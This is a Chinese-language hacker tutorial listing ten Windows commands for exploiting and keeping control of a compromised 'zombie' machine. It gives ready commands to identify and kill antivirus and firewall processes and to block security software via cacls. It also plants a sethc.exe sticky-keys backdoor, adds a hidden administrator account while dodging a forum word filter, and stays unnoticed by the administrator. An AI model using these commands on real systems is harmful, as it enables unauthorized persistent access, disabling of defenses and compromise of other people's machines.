1.ver
  作用:查看系统版本
  实例:ver
  说明:提权第一步就是查看这个是个人机器还是服务。
  2.tasklist
  作用:列出机器的所有进程
  实例:tasklist
  说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。后面就好办了,给他中马的时候,首先本地测试,免杀,再种上去,防止中马不成功,或者留下查杀记录。(笨的办法可以直接停止杀毒软件,见后面命令。不过这样管理员就肯定知道自己中***了,你长久控制肉鸡的目标也就要破碎了)。
  3.taskkill
  作用:杀制定名字或者pid的进程
  实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
  说明:使用它可以结束防火墙进程啥的。因为它阻止你打开网络端口,或者以这台肉鸡为代理进行其他扫描的。当然,也可以结束杀毒软件等。
  4.net start
  作用:列出机器所有服务或者启动某个指定的服务
  实例: net start 或者 net start w3svc(启动iis)
  说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
  比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
  5.net stop
  作用:停止指定的服务
  实例: net stop net stop sharedaccess (停止windows防火墙)
  说明:结合net start使用
6.cacls
  作用:设置文件权限
  实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone
  说明:可以用它来保护***文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。
  设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀***或者免疫:可参看[url]http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html[/url])
  7.&
  作用:连续执行多个命令
  实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。
  注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。
  8.echo y|
  作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
  实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;
  说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  (直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
  9.net us_er/group(_去掉,因为华夏屏蔽)
  作用:开帐号,并加入到组(一般是administrators组)
  实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
  说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:[url]http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html[/url]
  10.shutdown
  作用:重启或者关闭机器,或者取消关机
  实例:shutdown -r -t 0(立即重启)
  说明:该重启的时候重启吧,一般开服务或者中马之后。